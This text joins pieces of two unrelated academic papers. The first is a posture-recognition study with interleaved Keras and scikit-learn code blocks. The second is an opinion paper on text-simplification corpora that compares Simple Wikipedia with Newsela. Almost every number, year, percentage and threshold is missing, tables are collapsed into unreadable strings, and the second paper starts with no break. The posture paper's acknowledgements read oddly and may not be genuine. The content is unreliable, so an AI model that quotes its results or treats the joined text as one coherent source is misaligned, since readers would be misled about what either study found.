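x = layers.Dropout(0.5)(x)
outputs = layers.Dense(9, activation="sigmoid")(x)     # multi-label: branch + leaf probabilities
model = models.Model(inputs, outputs)
model.summary()
```

Wrapping the reduction blocks in TimeDistributed keeps them per-frame, so only the ConvLSTM layer sees (and then removes) the time dimension before the MobileNetV2 backbone takes over.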
algorithm was designed to work continuously and is able to automatically stop processing to stay compatible with green computing paradigm (okewu et al., ) to save energy. prediction of posture states we adopted the semantic matchmaking approach (ruta et al., ) to describe the semantic relationship between different postures using an ontological tree for analysis, reasoning and knowledge discovery. in order to extract the specific prediction label we parse the posture hierarchy tree (fig. ), first, by checking, which posture state is most likely according to the neural network. once we know, which posture type is most likely to be represented in the frame sequence, we proceed to the sub-nodes and check their predictions. we continue this search until we find the leaf node, which represents the actual label. this approach allows us to filter out the most likely path that is seen in the frames. this is helpful in cases when the similarities between postures is large. table layers of the proposed neural network architecture for human posture recognition. type filters size output input – – t × × depthwise convolution – × / t × × convolution × t × × spatial dropout p(x) = . – t × × depthwise convolution – × / t × × convolution × t × × spatial dropout p(x) = . – t × × lstm convolution × × spatial dropout p(x) = . – × mobilenetv – – × global average pooling – – , dropout p(x) = . – , fully-connected (sigmoid) – – kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for example, all forward postures share the same characteristics—shoulders are not at degree angle, and the head is positioned forward with respect to the body. this allows us to ignore all the weight influences, where for example, the person is lying down. additionally, the further down the tree the label leaves are the less of an overall recall error is, due to each level of the tree being ontologically similar, for example, predicting lying down, instead of partially lying down is a smaller error than predicting hunched over. loss function one of the reasons why we use the flattened final layer to represent our posture hierarchy is because we can represent our problem as multi-label classification (wang et al., ). this allows us to use binary cross-entropy (eq. ( )) in order to calculate the loss between expected output and ground truth: hp ¼ xn i¼ ŷi � logðyiÞ þ ð � ŷiÞ � logð � yiÞ ( ) figure activity diagram of the proposed method for sitting posture state recognition. full-size doi: . /peerj-cs. /fig- kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ binary cross-entropy classifier is fit for our multi-label classification task (wu et al., ) as each of our cells output is a binary one and more than one cell can be positive at a time, depending on how deep the classification is, as opposed to the categorical cross- entropy, which is a solution for multi-class tasks, where the input can yield only a single- class output. network training for training a neural network various optimization methods have been proposed. however, one of the most popular optimization methods due to its computational efficiency allowing training ann on large datasets more easily on weaker hardware in addition to the ability to achieve faster convergence than other methods is adam (kingma & ba, ). 
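Equation (1) above did not survive extraction cleanly; written out, it is the standard binary cross-entropy over the N output cells, where, following the surrounding text, the hat denotes the ground-truth value of cell i and y_i its predicted probability (the 1/N averaging factor is assumed, as the prefactor was lost):

```latex
H_p = -\frac{1}{N}\sum_{i=1}^{N}\Big[\hat{y}_i \log(y_i) + (1-\hat{y}_i)\log(1-y_i)\Big]
```

The hierarchical decoding described above (pick the most probable branch first, then compare only that branch's leaves) can be sketched as follows; the label names come from the paper, but the grouping of leaves under branches and the index layout of the flattened output vector are assumptions made for illustration.

```python
# Illustrative decoding of the flattened posture hierarchy produced by the sigmoid head.
HIERARCHY = {
    "straight posture": ["sitting straight"],
    "forward posture":  ["lightly hunched", "hunched over", "extremely hunched"],
    "backward posture": ["partially lying", "lying down"],
}
INDEX = {name: i for i, name in enumerate(
    list(HIERARCHY) + [leaf for leaves in HIERARCHY.values() for leaf in leaves])}

def decode(probabilities):
    """probabilities: sigmoid outputs for all branch and leaf cells."""
    branch = max(HIERARCHY, key=lambda b: probabilities[INDEX[b]])        # most likely branch
    leaf = max(HIERARCHY[branch], key=lambda l: probabilities[INDEX[l]])  # best leaf inside it
    return branch, leaf

print(decode([0.1, 0.8, 0.2, 0.3, 0.2, 0.7, 0.9, 0.1, 0.05]))
# ('forward posture', 'extremely hunched') under this assumed index layout
```

Because only children of the winning branch are compared, a spuriously high score on a semantically unrelated leaf (for example, lying down while the forward branch dominates) cannot be selected.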
for these reasons, we had opted to use adam for training using the initial training rate of e− , with a batch size of eight. additionally, we perform data augmentation as it has shown to improve ann generalization (fawzi et al., ). we perform horizontal image flipping in order to increase the view count, and perform random hue and saturation changes, aiming to increase stability against different lightning conditions as all of our video sequence instances were recorded during same time frame, therefore, maintaining nearly identical lightning. in all cases, the identical augmentation values are used for all images in the same series with the same probability of performing image flipping, hue and saturation augmentation being % independently. random hue shift is performed in the range of h = [ , π) radians, while the saturation has the random range of s = [ , ]. data collection anns have the benefit of doing all the heavy work upfront during the training therefore, allowing to improve system runtime by reducing the number of required calculations (holden et al., ). however, this approach depends on the quality of the training data, which can be defined in terms of the size of available samples, class balance and even the correctness of the labels. our approach depends on both color and depth information. unfortunately, still there are no publicly available labeled human posture dataset that additionally provides depth information. for our experiments, we have devised a methodology to create such dataset. the data collection procedure consists of two stages. stage i the person starts by sitting up straight. this position is then filmed for s. afterwards, the person is instructed to lightly hunch forward, which is followed by another s of sitting in this position. afterwards, the person is again instructed to hunch more, emulating their average hunching posture. after the filming, the subject is instructed once more to hunch forward in order to emulate the worst possible forward posture. once the s have been recorded in this posture, the person is then instructed to sit up straight for an additional s to get used to this position. then, we start emulating the bad backwards posture, i.e., lying down in the chair. the person is instructed to kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ partially lie in the chair for s, after which he/she is instructed to do it twice more in increasingly bad posture positions giving us three sets of bad forward and backward posture examples. stage ii the person is instructed to initially sit up straight. then the person is instructed to start slowly counting from one to five, while slowly worsening their forward posture. when the person finishes counting, he/she is expected to be in the worst forward posture they imagine. afterwards, the subject returns to straight position. this action is repeated for five times. once the forward posture data is recorded, the person is asked to perform the similar action, this time with backwards posture, where once again when they finish counting, they are fully lying in the chair. each of the stages is recorded three separate times using different camera perspectives at o’clock, o’clock and o’clock. the person is filmed in front of the computer desk and during the filming they are asked to interact with the table in their current posture how they imagine they would sit on the table. 
this can range from drawing on a piece of article, to checking the drawers, using keyboard or even holding their head with their hand. when collecting our dataset, we asked subjects (seven men and four women) to perform the posture emulation tasks. the informed consent was obtained, while we followed strictly the requirements of the helsinki declaration. the research was approved by the institutional review board, faculty of informatics, kaunas university of technology ( - - no. ifep - ). further expansion of dataset to include different body types or disabilities may additionally improve the results in more real world cases. data labelling once the data is collected it must be labeled manually. however, one of the issues when labeling data we have noticed that has caused some of the data points to be thrown out completely is for a person to actually differentiate properly what posture that person is in. even though the filming took in relatively discrete time intervals, some subjects may take longer/shorter to perform specified actions, they may attempt to fix their posture due to it being uncomfortable for them, etc. additionally, some people have indiscernible sitting straight and lightly hunched posture, as their normal posture is already biased towards leaning head forward. therefore, the labeling of such data is a challenge due to its subjectiveness as bad data labels may poison the network and cause it to overfit instead of generalizing. using our recorded dataset, we have extracted these labels: sitting straight, lightly hunched, hunched over, extremely hunched, partially lying and lying down. while we have three backwards posture angles, we opted for only two backwards posture labels as it is difficult to objectively measure lying down and extremely lying down as in multiple cases subjects barely made any movements. kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dataset our dataset consists of different captured video sequence instances totaling min of recording, which we split into individual labeled frames. we used -fold cross- validation. for training, we had split the data from each individual in : ratio instead of splitting the frames, as this gives more objective results, because similar frames from the same captured video will not be a part of evaluation, thus artificially increasing the recall rate. we can see the number of frames in training and testing frames in table , additionally we can see that dataset is slightly skewed towards sitting straight and lying down due to the dataset being not completely balanced. while class imbalance may cause issues in generalization of the network, we believe that the imbalance is not high enough to have a noticeable impact. finally, the examples of images in the dataset are given in table (right side view). the subjects presented in the images have provided their informed consent for publication of identifying images in an online open-access publication. results accuracy we evaluate the prediction correctness against ground truth in two stages: using final prediction labels (sitting straight, lightly hunched, hunched over, extremely hunched, partially lying, lying down); and intermediate branch predictions (forward posture, backward posture, straight posture). this provides us better insight on the prediction results as this will show both absolute error and intermediate branch error. the confusion matrix for the first case can be seen in fig. . 
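The subject-wise split described above, in which frames from the same person never appear on both the training and the evaluation side, can be expressed with scikit-learn's group-aware splitters. In the sketch below, the 80/20 ratio, the frame counts, and the use of subject identity as the grouping key (grouping by recorded video sequence would work the same way) are assumptions.

```python
# Sketch: split labelled frames so that no subject leaks across the train/test boundary.
import numpy as np
from sklearn.model_selection import GroupShuffleSplit

frames = np.arange(1000)                        # stand-in for the labelled frame indices
labels = np.random.randint(0, 6, size=1000)     # six leaf posture labels
subjects = np.random.randint(0, 11, size=1000)  # which of the 11 subjects each frame came from

splitter = GroupShuffleSplit(n_splits=1, train_size=0.8, random_state=0)
train_idx, test_idx = next(splitter.split(frames, labels, groups=subjects))

# no subject appears on both sides of the split
assert set(subjects[train_idx]).isdisjoint(subjects[test_idx])
print(len(train_idx), len(test_idx))
```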
in the first case, we achieved an accuracy of . %, sensitivity of . , specificity of . and f-score of . . note that the network has achieved a high specificity rate, which means that it can effectively recognize the subjects, who do not have the posture problems. as we can see from the confusion matrix (fig. ), the biggest issues arise in prediction regarding hunched over and extremely hunched labels. the proposed network model had a hard time discerning between these two values. this indicates that either our dataset for these two labels have little variation and the positions are very similar, or that one of the labels has been mislabeled and has poisoned the predicted values. this suggests that further investigation in our dataset is definitely needed. table frame count in the dataset. posture class training testing dataset (%) sitting straight . lightly hunched . hunched over . extremely hunched . partially lying . lying down . kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table examples of images in dataset (right side view). posture class rgb and depth images sitting straight lightly hunched forward hunched over forward extremely hunched forward partially lying down in the chair (continued) kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ however, all largest misclassification values occur between neighbouring classes (extremely hunched vs hunched over— . %), (hunched over vs extremely hunched— . %), (partially lying vs lying down— . %), (lying down vs partially lying— . %), suggesting that perhaps the need for some fuzzification of class definitions and interpretation of results, or that these posture classes should be combined. our dataset depends on the expert interpretation of what they are seeing in the camera, which may be the cause of this disparity. performing data labeling by more experts may improve the results as this would reduce the ambiguity in our dataset that we have due to a limited number of experts labeling the data. however, the network is accurate enough that it can suggest the labels in further labeling processing. this would change our solution from being supervised machine learning into semi-supervised or even completely figure confusion matrix indicating expected labels versus network predictions. accuracy values are given in percents. diagonal values indicate correct predictions. full-size doi: . /peerj-cs. /fig- table (continued) posture class rgb and depth images lying down in the chair kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ unsupervised machine learning approach. notwithstanding, this is beyond the scope of our research. however, if we investigate further we can see from fig. that the root posture prediction has better results, where the network model manages to generalize between forward posture, backward posture and straight posture cases. this partial confusion matrix (fig. ) makes it clear that while some finer detail in our dataset is less objective and is difficult for the network to generalize, the neural network itself is adept in solving the classification of the base postures with the mean accuracy rate of . % (sensitivity . , specificity . , f-score . and kappa . ). 
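The aggregate figures quoted above (accuracy, sensitivity, specificity, F-score, and kappa) can all be derived from a confusion matrix. The sketch below uses one-vs-rest, macro-averaged sensitivity and specificity, which is an assumption since the averaging scheme is not stated in the text, and random stand-in predictions so that the snippet runs on its own.

```python
# Deriving the reported summary metrics from a multi-class confusion matrix.
import numpy as np
from sklearn.metrics import confusion_matrix, f1_score, cohen_kappa_score, accuracy_score

y_true = np.random.randint(0, 6, size=200)   # six leaf posture classes (stand-in data)
y_pred = np.random.randint(0, 6, size=200)

cm = confusion_matrix(y_true, y_pred)
sens, spec = [], []
for k in range(cm.shape[0]):                 # one-vs-rest statistics per class
    tp = cm[k, k]
    fn = cm[k, :].sum() - tp
    fp = cm[:, k].sum() - tp
    tn = cm.sum() - tp - fn - fp
    sens.append(tp / (tp + fn))
    spec.append(tn / (tn + fp))

print("accuracy   ", accuracy_score(y_true, y_pred))
print("sensitivity", np.mean(sens))
print("specificity", np.mean(spec))
print("f-score    ", f1_score(y_true, y_pred, average="macro"))
print("kappa      ", cohen_kappa_score(y_true, y_pred))
```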
the bottom level (root) labels are more than enough in a lot of cases when it comes to posture recognition tasks that do not require precise user angle extraction. additionally, when comparing partial and full confusion matrices we can see that the deeper levels additionally have lower false negative results, indicating the addition of the hierarchical structure for prediction can inherently improve the prediction results in deeper levels due to the semantic connections between labels. performance due to fact that our approach uses mobilenetv as the backbone for our ann that means that is lightweight and can be used in real-time applications. our method performs a posture prediction on average in ms (which corresponds to fps rate) on a workstation with the following specifications: intel i - cpu with gb of ram, nvidia gpu with gb of gddr vram. comparison we compare our results with the results of other authors in table . figure confusion matrix indicating bottom level expected labels versus network predictions. accuracy values are given in percents. diagonal values indicate correct predictions. full-size doi: . /peerj-cs. /fig- kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ our method allows to achieve the real time sitting posture recognition with the same or better recognition accuracy and video resolution than other similar state-of-the-art methods. for example, wang et al. ( ) achieved higher accuracy and recognition rate, however their method require the visibility of full skeleton detected by kinect sensors and not occluded by any obstacles. gochoo et al. ( , ) achieved a very high recognition rate using three low resolution thermal sensors placed around the subject to recognize eight postures and yoga postures, respectively, but no occlusions were allowed either. tariq et al. ( ) used kinect and additional motion sensors from smartwatch to achieve the required level of accuracy. discussion the training of neural network depends on hardware used for recording. we used intel realsense d i, but the results may be worse when using different hardware, for example, kinectv as these two devices produce different noise in their depth fields. this may cause the network to have poorer results when compared to the one that it has been trained on. however, we are not able to validate this claim. additionally, when testing the network using the real-time camera feed we had noticed that while relatively similar and their mirror image angles work it may have lower precision rates with something more extreme like placing sensor very high or very low relative to the table or user. finally, when using in real world application, one of the measures to improve prediction stability is to use majority voting on the preceding video frames. this is performed by taking the prediction label that had appeared the most times in the previous recorded frames. this technique can improve the stability of the predictions as a single video frame will no longer change the prediction results. however, the predictions will have a delay, due to previous video frames influencing the result for a short period of time. table comparison of posture recognition methods. method frame resolution, px frame rate, fps accuracy, % task reference real-time deformable detector × . hand posture recognition hernandez-belmonte & ayala-ramirez ( ) ensemble of inceptionresnetv × n/a . 
four postures (standing, sitting, lying, and lying crouched) byeon et al. ( ) lvq (learning vector quantization) neural network × . five full-skeleton postures (standing, sitting, stooping, kneeling, and lying) wang et al. ( ) multi-stage convolutional neural network (m-cnn) n/a . two postures for fall detection zhang, wu & wang ( ) lvq neural network × . eight postures (stand, hand raise, akimbo, open wide arms, squat, toe touch, crawl, and lie) gochoo et al. ( ) deep cnn × . yoga postures gochoo et al. ( ) d cnn n/a n/a . detection of standstill body poses. liu et al. ( ) deep recurrent hierarchical network × . spine posture recognition while sitting this paper note: n/a, data is not available. kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ another limitation of this study is a small number of subjects ( ), all healthy, which may have influenced the validity of the results. the age range and gender diversity of the subject group was limited. in future, we will have to extend the subject group to include various professional/occupational groups as well as school children and adolescents as well as people with different body types and disabilities in order to improve the results for real world cases. conclusion we have proposed an extension of the mobilenetv neural network, which allows the use of sequential video data as an input, therefore, allowing for the deep neural network to extract important temporal features from video frames, which would otherwise be lost when compared to a single-frame classification while still being capable of the single-frame prediction due to being biased towards the last frame. we have improved the top-layer of the mobilenetv architecture by adding the hierarchical data representation, which acts as a semantic lock for top-level label classification by filtering out the invalid class labels early. additionally, we have performed a pilot study based in which we suggest the methodology required to collect the training dataset and validation datasets. further improvements in dataset collection methodology can be made in order to account for different body shapes, disabilities and removing labeling ambiguities. the proposed posture classification approach is highly extensible due to its flattened tree representation, which can be easily adapted to the already existing posture classification tasks with the depth of the ontological semantic posture model being one of the driving factors for classification quality. based on our validation data giving us a classification accuracy of . % in predicting three main sitting posture classes (backward posture, forward posture and straight posture) at a rate of fps. finally, unlike in related work, our method does not depend on the skeletal predictors, therefore we can perform the sitting human posture prediction when only as low as % of the human torso is visible in the frame. for these reasons, we believe that our approach is more robust for real-time human posture classification tasks in the real-world office environment. acknowledgements we thank the honorable research prof. s. misra (turkey) for tuning our model for green computing awareness, prof. a. lawrinson (usa) for his inspiration of semantical frame analysis, and the team of prof. m. von gleiwitz and d. pollack (argentina) for their suggestions of the pareto optimization method to improve mobilenet performance. 
additional information and declarations. funding: the authors received no funding for this work. competing interests: robertas damaševičius is an academic editor for peerj.
problems in current text simplification research: new data can help

wei xu and chris callison-burch (computer and information science department, university of pennsylvania, {xwe, ccb}@seas.upenn.edu) and courtney napoles (department of computer science, johns hopkins university, courtneyn@jhu.edu)

abstract

simple wikipedia has dominated simplification research in recent years. in this opinion paper, we argue that focusing on wikipedia limits simplification research. we back up our arguments with corpus analysis and by highlighting statements that other researchers have made in the simplification literature. we introduce a new simplification dataset that is a significant improvement over simple wikipedia, and present a novel quantitative-comparative approach to study the quality of simplification data resources.

introduction

the goal of text simplification is to rewrite complex text into simpler language that is easier to understand. research into this topic has many potential practical applications. for instance, it can provide reading aids for people with disabilities (carroll et al., ; canning et al., ; inui et al., ), low-literacy (watanabe et al., ; de belder and moens, ), non-native backgrounds (petersen and ostendorf, ; allen, ) or non-expert knowledge (elhadad and sutaria, ; siddharthan and katsos, ). text simplification may also help improve the performance of many natural language processing (nlp) tasks, such as parsing (chandrasekar et al., ), summarization (siddharthan et al., ; klebanov et al., ; vanderwende et al., ; xu and grishman, ), semantic role labeling (vickrey and koller, ), information extraction (miwa et al., ) and machine translation (gerber and hovy, ; chen et al., ), by transforming long, complex sentences into ones that are more easily processed.

the parallel wikipedia simplification (pwkp) corpus prepared by zhu et al. ( ) has become the benchmark dataset for training and evaluating automatic text simplification systems. an associated test set of sentences from wikipedia has been used for comparing the state-of-the-art approaches. the collection of simple-complex parallel sentences sparked a major advance for machine translation-based approaches to simplification. however, we will show that this dataset is deficient and should be considered obsolete.

in this opinion paper, we argue that wikipedia as a simplification data resource is suboptimal for several reasons: ) it is prone to automatic sentence alignment errors; ) it contains a large proportion of inadequate simplifications; ) it generalizes poorly to other text genres. these problems are largely due to the fact that simple wikipedia is an encyclopedia spontaneously and collaboratively created for "children and adults who are learning english language" without more specific guidelines. we quantitatively illustrate the seriousness of these problems through manual inspection and statistical analysis.

our manual inspection reveals that about half of the sentence pairs in the pwkp corpus are not simplifications. we also introduce a new comparative approach to simplification corpus analysis. in particular, we assemble a new simplification corpus of news articles, re-written by professional editors to meet the readability standards for children at multiple grade levels. (this newsela corpus can be requested following the instructions at: https://newsela.com/data/)
this parallel corpus is higher quality and its size is comparable to the pwkp dataset. it helps us to showcase the limitations of wikipedia data in comparison and it provides potential remedies that may improve simplification research.

we are not the only researchers to notice problems with simple wikipedia. there are many hints in past publications that reflect the inadequacy of this resource, which we piece together in this paper to support our arguments. several different simplification datasets have been proposed (bach et al., ; woodsend and lapata, a; coster and kauchak, ; woodsend and lapata, b), but most of these are derived from wikipedia and not thoroughly analyzed. siddharthan ( )'s excellent survey of text simplification research states that one of the most important questions that needs to be addressed is "how good is the quality of simple english wikipedia". to the best of our knowledge, we are the first to systematically quantify the quality of simple english wikipedia and directly answer this question.

we make our argument not as a criticism of others or ourselves, but as an effort to refocus research directions in the future (eisenstein, ). we hope to inspire the creation of higher quality simplification datasets, and to encourage researchers to think critically about existing resources and evaluation methods. we believe this will lead to breakthroughs in text simplification research.

table 1: example sentence pairs (norm-simp) aligned between english wikipedia and simple english wikipedia. the breakdown in percentages is obtained through manual examination of randomly sampled sentence pairs in the parallel wikipedia simplification (pwkp) corpus.
not aligned ( %):
[norm] the soprano ranges are also written from middle c to a an octave higher, but sound one octave higher than written. [simp] the xylophone is usually played so that the music sounds an octave higher than written.
not simpler ( %):
[norm] chile is the longest north-south country in the world, and also claims of antarctica as part of its territory. [simp] chile, which claims a part of the antarctic continent, is the longest country on earth.
[norm] death on october , strauss collapsed while hunting with the prince of thurn and taxis in the thurn and taxis forests, east of regensburg. [simp] death on october , , strauß collapsed while hunting with the prince of thurn and taxis in the thurn and taxis forests, east of regensburg.
real simplification ( %):
deletion only ( %): [norm] this article is a list of the u.s. states and the district of columbia ordered by population density. [simp] this is a list of the u.s. states, ordered by population density.
paraphrase only ( %): [norm] in , both russia and china also had prison populations in excess of million. [simp] in , both russia and china also had over million people in prison.
deletion + paraphrase ( %): [norm] all adult muslims, with exceptions for the infirm, are required to offer salat prayers five times daily. [simp] all adult muslims should do salat prayers five times a day.

simple wikipedia is not that simple

the parallel wikipedia simplification (pwkp) corpus (zhu et al., ) contains approximately , automatically aligned sentence pairs from cross-linked articles between simple and normal english wikipedia.
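the per-category percentages in table 1 come from a small manual audit of randomly sampled pairs. as a rough illustration of that bookkeeping (not the authors' actual tooling), the sketch below samples pairs from a hypothetical tab-separated dump of the pwkp corpus and tallies hand-assigned labels; the file name, file format and sample size are all assumptions.

```python
import csv
import random
from collections import Counter

# hypothetical layout: one aligned pair per line, tab-separated
# (normal sentence, simple sentence); the real pwkp release may differ.
PAIRS_FILE = "pwkp_aligned_pairs.tsv"   # assumed file name
SAMPLE_SIZE = 100                       # the paper's sample size is elided in this copy

def load_pairs(path):
    """Read (normal, simple) sentence pairs from a tab-separated file."""
    with open(path, encoding="utf-8") as f:
        return [row for row in csv.reader(f, delimiter="\t") if len(row) == 2]

def sample_for_audit(pairs, n, seed=0):
    """Draw a reproducible random sample of pairs for manual annotation."""
    random.seed(seed)
    return random.sample(pairs, min(n, len(pairs)))

def breakdown(labels):
    """Percentage breakdown of manually assigned categories, e.g.
    'not_aligned', 'not_simpler', 'deletion_only', 'paraphrase_only',
    'deletion_and_paraphrase'."""
    counts = Counter(labels)
    total = sum(counts.values())
    return {category: 100.0 * count / total for category, count in counts.items()}

if __name__ == "__main__":
    pairs = load_pairs(PAIRS_FILE)
    for norm, simp in sample_for_audit(pairs, SAMPLE_SIZE)[:3]:
        print("[norm]", norm)
        print("[simp]", simp)
        print()
    # after annotating the sample by hand:
    # print(breakdown(["not_aligned", "not_simpler", "paraphrase_only", ...]))
```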
it has become a benchmark dataset for simplification largely because of its size and availability, and because follow-up papers (woodsend and lapata, a; coster and kauchak, ; wubben et al., ; narayan and gardent, ; siddharthan and angrosh, ; angrosh et al., ) often compare with zhu et al.’s system outputs to demonstrate further improvements. the large quantity of parallel text from wikipedia made it possible to build simplification systems us- ing statistical machine translation (smt) technol- ogy. but after the initial success of these first- generation systems, we started to suffer from the inadequacy of the parallel wikipedia simplification datasets. there is scattered evidence in the litera- ture. bach et al. ( ) mentioned they have at- tempted to use parallel wikipedia data, but opted to construct their own corpus of sentences ( % from new york times and % are from wikipedia) with one manual simplification per sentence. wood- send and lapata ( a) showed that rewriting rules learned from simple wikipedia revision his- tories produce better output compared to the “un- avoidably noisy” aligned sentences from simple- normal wikipedia. the woodsend and lapata ( b) model, that used quasi-synchronous gram- mars learned from wikipedia revision history, left % sentences unchanged in the test set. wubben et al. ( ) found that a phrase-based machine translation model trained on the pwkp dataset of- ten left the input unchanged, since “much of train- ing data consists of partially equal input and out- put strings”. coster and kauchak ( ) constructed another parallel wikipedia dataset using a more so- phisticated sentence alignment algorithm with an additional step that first aligns paragraphs. they no- ticed that % aligned sentences are identical be- tween simple and normal, and retained them in the dataset “since not all sentences need to be simplified and it is important for any simplification algorithm to be able to handle this case”. however, we will show that many sentences that need to be simplified are not simplified in the simple wikipedia. we manually examined the parallel wikipedia simplification (pwkp) corpus and found that it is noisy and half of its sentence pairs are not simplifi- cations (table ). we randomly sampled one-to- one sentence pairs from the pwkp dataset (one-to- many sentence splitting cases consist of only . % of the dataset), and classify each sentence pair into one of the three categories: not aligned ( %) - two sentences have different meanings, or only have partial content overlap. not simpler ( %)- the simp sentence has the same meaning as the norm sentence, but is not simpler. real simplification ( %)- the simp sentence has the same meaning as the norm sentence, and is simpler. we fur- ther breakdown into whether the simplification is due to deletion or paraphrasing. table shows a detailed breakdown and repre- sentative examples for each category. although zhu et al. ( ) and coster and kauchak ( ) have provided a simple analysis on the accuracy of sen- tence alignment, there are some important facts that cannot be revealed without in-depth manual inspec- tion. the “non-simplification” noise in the parallel simple-normal wikipedia data is a much more se- rious problem than we all thought. the quality of “real simplifications” also varies: some sentences are simpler by only one word while the rest of sen- tence is still complex. 
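several of the complaints quoted above (identical pairs retained in the data, systems leaving the input unchanged) can be checked mechanically. the following sketch estimates how many pairs in a parallel simplification corpus are string-identical or barely changed; the 0.9 word-overlap cutoff for "barely changed" is an arbitrary illustrative choice, not a value from the paper.

```python
def word_jaccard(a, b):
    """Word-overlap Jaccard similarity between two sentences."""
    wa, wb = set(a.lower().split()), set(b.lower().split())
    if not wa and not wb:
        return 1.0
    return len(wa & wb) / len(wa | wb)

def unchanged_statistics(pairs, near_threshold=0.9):
    """pairs: iterable of (normal, simple) strings.
    Returns (fraction of string-identical pairs,
             fraction of non-identical pairs whose word overlap
             is at least `near_threshold`)."""
    identical = near = total = 0
    for norm, simp in pairs:
        total += 1
        if norm.strip() == simp.strip():
            identical += 1
        elif word_jaccard(norm, simp) >= near_threshold:
            near += 1
    return identical / total, near / total

# toy example with one unchanged pair and one genuinely simplified pair
pairs = [
    ("chile is the longest north-south country in the world .",
     "chile is the longest north-south country in the world ."),
    ("all adult muslims , with exceptions for the infirm , are required to offer salat prayers five times daily .",
     "all adult muslims should do salat prayers five times a day ."),
]
print(unchanged_statistics(pairs))   # -> (0.5, 0.0)
```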
the main causes of non-simplifications and partial-simplifications in the parallel wikipedia cor- pus include: ) the simple wikipedia was created by volunteer contributors with no specific objective; ) very rarely are the simple articles complete re-writes of the regular articles in wikipedia (coster and kauchak, ), which makes automatic sentence alignment errors worse; ) as an encyclo- pedia, wikipedia contains many difficult sentences with complex terminology. the difficulty of sen- tence alignment between normal-simple wikipedia is highlighted by a recent study by hwang et al. ( ) that achieves state-of-the-art performance of . maximum f score (over the precision- recall curve) by combining wiktionary-based and dependency-parse-based sentence similarities. and in fact, even the simple side of the pwkp corpus contains an extensive english vocabulary of , unique words. , of these words do not exist in the normal side (table ). below is a sentence from an article entitled “photolithography" in simple wikipedia: microphototolithography is the use of pho- tolithography to transfer geometric shapes on a photomask to the surface of a semiconductor wafer for making integrated circuits. we should use the pwkp corpus with caution and consider other alternative parallel simplification cor- pora. alternatives could come from wikipedia (but better aligned and selected) or from manual simpli- fication of other domains, such as newswire. in the pwkp normal simple #words (avg. freq) , ( . ) , ( . ) normal , ( . ) simple , ( . ) table : the vocabulary size of the parallel wikipedia simplification (pwkp) corpus and the vocabulary difference between its normal and sim- ple sides (as a × matrix). only words consisting of the english letters are counted. next section, we will present a corpus of news ar- ticles simplified by professional editors, called the newsela corpus. we perform a comparative corpus analysis of the newsela corpus versus the pwkp corpus to further illustrate concerns about pwkp’s quality. what the newsela corpus teaches us to study how professional editors conduct text sim- plification, we have assembled a new simplification dataset that consists of , news articles. each ar- ticle has been re-written times for children at dif- ferent grade levels by editors at newsela , a com- pany that produces reading materials for pre-college classroom use. we use simp- to denote the most simplified level and simp- to denote the least sim- plified level. this data forms a parallel corpus, where we can align sentences at different reading levels, as shown in table . unlike simple wikipedia, which was created without a well-defined objective, newsela is meant to help teachers prepare curricula that match the en- glish language skills required at each grade level. it is motivated by the common core standards (porter et al., ) in the united states. all the newsela ar- ticles are grounded in the lexile readability score, which is widely used to measure text complexity and assess students’ reading ability. . manual examination of newsela corpus we conducted a manual examination of the newsela data similar to the one for wikipedia data in table . the breakdown of aligned sentence pairs between different versions in newsela is shown in figure . https://newsela.com/ http://en.wikipedia.org/wiki/lexile figure : manual classification of aligned sentence pairs from the newsela corpus. we categorize ran- domly sampled sentence pairs drawn from the original-simp and sentences from the original- simp . 
it is based on randomly selected sentence pairs and shows much more reliable simplification than the wikipedia data.

we designed a sentence alignment algorithm for the newsela corpus based on jaccard similarity (jaccard, ). we first align each sentence s_1 in the simpler version to the sentence s_2 in the immediately more complex version with the highest similarity score. we compute the similarity based on overlapping word lemmas:

sim(s_1, s_2) = \frac{|lemmas(s_1) \cap lemmas(s_2)|}{|lemmas(s_1) \cup lemmas(s_2)|}    (1)

we then align sentences into groups across all versions for each article. for cases where no sentence splitting is involved, we discard any sentence pairs with a similarity smaller than . ; if splitting occurs, we set the similarity threshold to . instead. (we use the wordnet lemmatization in the nltk package: http://www.nltk.org/)

newsela's professional editors produce simplifications with noticeably higher quality than wikipedia's simplifications. compared to sentence alignment for normal-simple wikipedia, automatically aligning newsela is more straightforward and reliable. the better correspondence between the simplified and complex articles and the availability of multiple simplified versions in the newsela data also contribute to the accuracy of sentence alignment.

l : slightly more fourth-graders nationwide are reading proficiently compared with a decade ago, but only a third of them are now reading well, according to a new report.
l : fourth-graders in most states are better readers than they were a decade ago. but only a third of them actually are able to read well, according to a new report.
l : fourth-graders in most states are better readers than they were a decade ago. but only a third of them actually are able to read well, according to a new report.
l : most fourth-graders are better readers than they were years ago. but few of them can actually read well.
l : fourth-graders are better readers than years ago. but few of them read well.
table 3: example of sentences written at multiple levels of text complexity from the newsela data set (columns: grade level, lexile score, text). the lexile readability score and grade level apply to the whole article rather than individual sentences, so the same sentences may receive different scores, e.g. the above sentences for the th and th grades. the bold font highlights the parts of sentence that are different from the adjacent version(s).

table 4: basic statistics of the newsela simplification corpus vs. the parallel wikipedia simplification (pwkp) corpus (rows: total #sents, total #tokens, avg #sents per doc, avg #words per doc, avg #words per sent, avg #chars per word; columns: newsela original and simp-1 through simp-4, and pwkp normal and simple). the newsela corpus consists of articles with original and simplified versions each. simp- is of the least simplified level, while simp- is the most simplified. the numbers marked by * are slightly different from previously reported, because of the use of different tokenizers.
